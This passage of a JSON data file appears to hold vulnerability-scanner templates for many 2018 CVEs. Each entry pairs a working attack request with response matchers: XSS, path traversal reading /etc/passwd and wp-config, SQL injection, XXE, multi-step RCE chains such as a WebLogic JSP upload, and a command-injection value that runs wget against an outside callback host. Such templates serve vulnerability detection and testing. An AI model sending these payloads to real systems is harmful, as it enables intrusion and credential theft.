Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/community/?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12909","info":{"name":"Webgrind <= 1.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?op=fileviewer&file=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","webgrind"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18775","info":{"name":"Microstrategy Web 7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/microstrategy7/Login.asp?Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3B%3C%2Fscript%3E%3C"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(/{{randstr}}/);</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-0296","info":{"name":"Cisco ASA - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions"],"headers":{"Accept-Encoding":"deflate"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["///sessions"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-2894","info":{"name":"Oracle WebLogic Server - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /ws_utc/resources/setting/options HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsetting_id=general&BasicConfigOptions.workDir=%2Fu01%2Foracle%2Fuser_projects%2Fdomains%2Fbase_domain%2Fservers%2FAdminServer%2Ftmp%2F_WL_internal%2Fcom.oracle.webservices.wls.ws-testclient-app-wls%2F4mcj4y%2Fwar%2Fcss&BasicConfigOptions.proxyHost=&BasicConfigOptions.proxyPort=80\n","POST /ws_utc/resources/setting/keystore HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryuim0dyiDSPBPu31g\n\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_name\"\n\n{{randstr}}\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_edit_mode\"\n\nfalse\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_password_front\"\n\n\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_password\"\n\n\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_password_changed\"\n\nfalse\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_filename\"; filename=\"{{randstr}}.jsp\"\nContent-Type: application/octet-stream\n\n<%@ page import=\"java.util.*,java.io.*\"%>\n<%@ page import=\"java.security.MessageDigest\"%>\n\n<%\nString cve = \"CVE-2018-2894\";\nMessageDigest alg = MessageDigest.getInstance(\"MD5\");\nalg.reset();\nalg.update(cve.getBytes());\nbyte[] digest = alg.digest();\nStringBuffer hashedpasswd = new StringBuffer();\nString hx;\nfor (int i=0;i<digest.length;i++){\n  hx =  Integer.toHexString(0xFF & digest[i]);\n  //0x03 is equal to 0x3, but we need 0x03 for our md5sum\n  if(hx.length() == 1){hx = \"0\" + hx;}\n  hashedpasswd.append(hx);\n}\n\nout.println(hashedpasswd.toString());\n%>\n------WebKitFormBoundaryuim0dyiDSPBPu31g--\n","GET /ws_utc/css/config/keystore/{{id}}_{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","words":["26ec00a3a03f6bfc5226fd121567bb58"]}],"extractors":[{"type":"regex","name":"id","group":1,"regex":["<keyStoreItem><id>([0-9]+)</id><name>{{randstr}}"],"internal":true}]}]},{"id":"CVE-2018-14912","info":{"name":"cgit < 1.2.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-8719","info":{"name":"WordPress WP Security Audit Log 3.1.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/uploads/wp-security-audit-log/failed-logins/"],"matchers-condition":"and","matchers":[{"type":"word","words":["[TXT]",".log","Index of"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12300","info":{"name":"Seagate NAS OS 4.3.15.1 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/echo-server.html?code=test&state=http://www.interact.sh#"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2018-1000856","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /segments/add.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&raw_domain_list=test.com&new_description=test&new_notes=test\n","GET /segments/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"host-redirects":true,"max-redirects":3,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(1)</script></a>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19751","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /admin/ssl-fields/add.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_field_name=new&new_field_type_id=1&new_description=test&new_notes=test\n","GET /admin/ssl-fields/ HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script></a>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7602","info":{"name":"Drupal - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /?q=user%2Flogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_id=user_login&name={{username}}&pass={{password}}&op=Log+in\n","GET /?q={{url_encode(\"{{userid}}\")}}%2Fcancel HTTP/1.1\nHost: {{Hostname}}\n","POST /?q={{url_encode(\"{{userid}}\")}}%2Fcancel&destination={{url_encode(\"{{userid}}\")}}%2Fcancel%3Fq%5B%2523post_render%5D%5B%5D%3Dpassthru%26q%5B%2523type%5D%3Dmarkup%26q%5B%2523markup%5D%3Decho+COP-2067-8102-EVC+|+rev HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_id=user_cancel_confirm_form&form_token={{form_token}}&_triggering_element_name=form_id&op=Cancel+account\n","POST /?q=file%2Fajax%2Factions%2Fcancel%2F%23options%2Fpath%2F{{form_build_id}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_build_id={{form_build_id}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"word","words":["CVE-2018-7602-POC"]}],"extractors":[{"type":"regex","name":"userid","group":1,"regex":["<meta about=\"([/a-z0-9]+)\" property=\"foaf"],"internal":true,"part":"body"},{"type":"regex","name":"form_token","group":1,"regex":["<input type=\"hidden\" name=\"form_token\" value=\"(.*)\" />"],"internal":true,"part":"body"},{"type":"regex","name":"form_build_id","group":1,"regex":["<input type=\"hidden\" name=\"form_build_id\" value=\"(.*)\" />"],"internal":true,"part":"body"}]}]},{"id":"CVE-2018-2791","info":{"name":"Oracle Fusion Middleware WebCenter Sites - Cross-Site Scripting","severity":"high"},"requests":[{"raw":["GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=qqq%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{BaseURL}}\n","GET /cs/Satellite?destpage=\"<h1xxx\"><script>alert(document.domain)</script>&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError HTTP/1.1\nHost: {{BaseURL}}\n"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>/graphics/common/screen/dotclear.gif"]},{"type":"word","part":"body","words":["<script>alert(24)</script>","Missing translation key"],"condition":"and"}]}]},{"id":"CVE-2018-17254","info":{"name":"Joomla! JCK Editor SQL Injection","severity":"critical"},"requests":[{"raw":["GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=\"%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5({{num}})),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}\n"],"matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]}]}]},{"id":"CVE-2018-19136","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","GET /assets/edit/registrar-account.php?raid=hello%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&del=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>&really_del=1\">YES"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19749","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/account-owner.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_owner=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_notes=\n","GET /assets/account-owners.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, '><script>alert(document.domain)</script></a>')"],"condition":"and"}]}]},{"id":"CVE-2018-6184","info":{"name":"Zeit Next.js <4.2.3 -  Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/_next/../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000671","info":{"name":"Sympa version =>6.2.16 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sympa?referer=http://interact.sh&passwd=&previous_action=&action=login&action_login=&previous_list=&list=&email="],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2018-19892","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /admin/dw/add-server.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_host=abc&new_protocol=https&new_port=2086&new_username=abc&new_api_token=255&new_hash=&new_notes=\n","GET /admin/dw/servers.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":3,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script></a>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16299","info":{"name":"WordPress Localize My Post 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-8033","info":{"name":"Apache OFBiz 16.11.04 - XML Entity Injection","severity":"high"},"requests":[{"raw":["POST /webtools/control/xmlrpc HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: application/xml\n\n<?xml version=\"1.0\"?><!DOCTYPE x [<!ENTITY disclose SYSTEM \"file://///etc/passwd\">]><methodCall><methodName>&disclose;</methodName></methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19365","info":{"name":"Wowza Streaming Engine Manager 4.7.4.01 - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-6605","info":{"name":"Joomla! Component Zh BaiduMap 3.0.0.1 - SQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPlacemarkDetails"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"body":"id=-1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,md5({{num}}),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+","matchers-condition":"and","matchers":[{"type":"word","words":["{{md5(num)}}","dataexists"],"part":"body"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1207","info":{"name":"Dell iDRAC7/8 Devices - Remote Code Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/login?LD_DEBUG=files"],"matchers":[{"type":"word","part":"response","words":["calling init: /lib/"]}]}]},{"id":"CVE-2018-8823","info":{"name":"PrestaShop Responsive Mega Menu Module - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/modules/bamegamenu/ajax_phpcode.php?code=print(md5({{num}}))"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11231","info":{"name":"Opencart Divido - Sql Injection","severity":"high"},"requests":[{"raw":["POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1\nHost: {{Hostname}}\n\n{\"metadata\":{\"order_id\":\"1 and updatexml(1,concat(0x7e,(SELECT md5({{num}})),0x7e),1)\"},\"status\":2}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000600","info":{"name":"Jenkins GitHub Plugin <=1.29.1 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://{{interactsh-url}}"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2018-12095","info":{"name":"OEcms 3.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16761","info":{"name":"Eventum <3.4.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/select_project.php?url=http://interact.sh","{{BaseURL}}/clock_status.php?current_page=http://interact.sh"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2018-18323","info":{"name":"Centos Web Panel 0.9.8.480 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10095","info":{"name":"Dolibarr <7.0.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/dolibarr/adherents/cartes/carte.php?&mode=cardlogin&foruserlogin=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&model=5160&optioncss=print"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-2392","info":{"name":"SAP Internet Graphics Server (IGS) - XML External Entity Injection","severity":"high"},"requests":[{"raw":["POST /XMLCHART HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary={{randstr_1}}\n\n--{{randstr_1}}\nContent-Disposition: form-data; name=\"{{randstr_2}}\"; filename=\"{{randstr_3}}.xml\"\nContent-Type: application/xml\n\n<?xml version='1.0' encoding='UTF-8'?>\n    <ChartData>\n      <Categories>\n        <Category>ALttP</Category>\n      </Categories>\n      <Series label=\"{{randstr_4}}\">\n        <Point>\n          <Value type=\"y\">12345</Value>\n        </Point>\n      </Series>\n    </ChartData>\n--{{randstr_1}}\nContent-Disposition: form-data; name=\"{{randstr_5}}\"; filename=\"{{randstr_6}}.xml\"\nContent-Type: application/xml\n\n<?xml version='1.0' encoding='UTF-8'?>\n    <!DOCTYPE Extension [<!ENTITY xxe SYSTEM \"/etc/passwd\">]>\n    <SAPChartCustomizing version=\"1.1\">\n      <Elements>\n        <ChartElements>\n          <Title>\n            <Extension>&xxe;</Extension>\n          </Title>\n        </ChartElements>\n      </Elements>\n    </SAPChartCustomizing>\n--{{randstr_1}}--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Picture","Info","/output/"],"condition":"and"},{"type":"word","part":"body","words":["ImageMap","Errors"],"condition":"or"},{"type":"word","part":"header","words":["text/html","SAP Internet Graphics Server"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10201","info":{"name":"Ncomputing vSPace Pro 10 and 11 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini","{{BaseURL}}/...\\...\\...\\...\\...\\...\\...\\...\\...\\windows\\win.ini","{{BaseURL}}/..../..../..../..../..../..../..../..../..../windows/win.ini","{{BaseURL}}/....\\....\\....\\....\\....\\....\\....\\....\\....\\windows\\win.ini"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2018-17246","info":{"name":"Kibana - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"message\":\"An internal server error occurred\""]},{"type":"word","part":"header","words":["kbn-name","kibana"],"case-insensitive":true,"condition":"or"},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2018-7467","info":{"name":"AxxonSoft Axxon Next - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET //css//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\\win.ini HTTP/1.1\nHost: {{Hostname}}\n\n"],"unsafe":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2018-18925","info":{"name":"Gogs (Go Git Service) 0.11.66 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nCookie: lang=en-US; i_like_gogits=../../../../etc/passwd;\n","GET / HTTP/1.1\nHost: {{Hostname}}\nCookie: lang=en-US; i_like_gogits=../../../../etc/dummy;\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 500 && status_code_2 == 200 && contains(body_2, \"<meta name=\\\"author\\\" content=\\\"Gogs\\\" />\")"]}]}]},{"id":"CVE-2018-19915","info":{"name":"DomainMOD <=4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/host.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_host=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_notes=test\n","GET /assets/hosting.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"><script>alert(document.domain)</script></a>\")"],"condition":"and"}]}]},{"id":"CVE-2018-16167","info":{"name":"LogonTracer <=1.2.0 - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /upload HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogtype=XML&timezone=1%3Bwget+http%3A%2F%2F{{interactsh-url}}%3B\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2018-16139","info":{"name":"BIBLIOsoft BIBLIOpac 2008 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bibliopac/bin/wxis.exe/bibliopac/?IsisScript=bibliopac/bin/bibliopac.xic&db=\"><script>prompt(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>prompt(document.domain)</script>.xrf"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20985","info":{"name":"WordPress Payeezy Pay <=2.97 - Local File Inclusion","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-content/plugins/wp-payeezy-pay/donate.php"],"body":"x_login=../../../wp-config","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["The base configuration for WordPress","define( 'DB_NAME',","define( 'DB_PASSWORD',"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-8770","info":{"name":"Cobub Razor 0.8.0 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/tests/generate.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Fatal error: Class 'PHPUnit_Framework_TestCase' not found in ","/application/third_party/CIUnit/libraries/CIUnitTestCase.php on line"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16671","info":{"name":"CirCarLife <4.3 - Improper Authentication","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/html/device-id"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["CirCarLife Scada"]},{"type":"word","part":"body","words":["circontrol"]},{"type":"regex","part":"body","regex":["(19|20)\\d\\d[- /.](0[1-9]|1[012])[- /.](0[1-9]|[12][0-9]|3[01])"]}]}]},{"id":"CVE-2018-7719","info":{"name":"Acrolinx Server <5.2.5 - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1\nHost: {{Hostname}}\n\n"],"unsafe":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2018-3760","info":{"name":"Ruby On Rails - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /assets/file:%2f%2f/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n","GET /assets/file:%2f%2f{{path}}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"path","regex":["/etc/passwd is no longer under a load path: (.*?),"],"internal":true,"part":"body"}]}]},{"id":"CVE-2018-10737","info":{"name":"NagiosXI <= 5.4.12 logbook.php SQL injection","severity":"high"},"requests":[{"raw":["POST /nagiosql/admin/logbook.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntxtSearch=' and (select 1 from(select count(*),concat((select (select (select md5({{num}}))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#\n"],"matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]}]}]},{"id":"CVE-2018-17431","info":{"name":"Comodo Unified Threat Management Web Console - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n","GET /manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Configuration has been altered"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7490","info":{"name":"uWSGI PHP Plugin Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10738","info":{"name":"NagiosXI <= 5.4.12 menuaccess.php - SQL injection","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/nagiosql/admin/menuaccess.php"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"body":"selSubMenu=1&subSave=1&chbKey1=-1%' and (select 1 from(select count(*),concat((select (select (select md5({{num}}))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]}]}]},{"id":"CVE-2018-14931","info":{"name":"Polarisft Intellect Core Banking Software Version 9.7.1 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/IntellectMain.jsp?IntellectSystem=https://www.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2018-20010","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/ssl-provider-account.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_ssl_provider_id=1&new_owner_id=1&new_email_address=&new_username=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_password=&new_reseller=0&new_reseller_id=&new_notes=\n","GET /assets/ssl-accounts.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"><script>alert(document.domain)</script></a>\")"],"condition":"and"}]}]},{"id":"CVE-2018-9205","info":{"name":"Drupal avatar_uploader v7.x-1.0-beta8 - Local 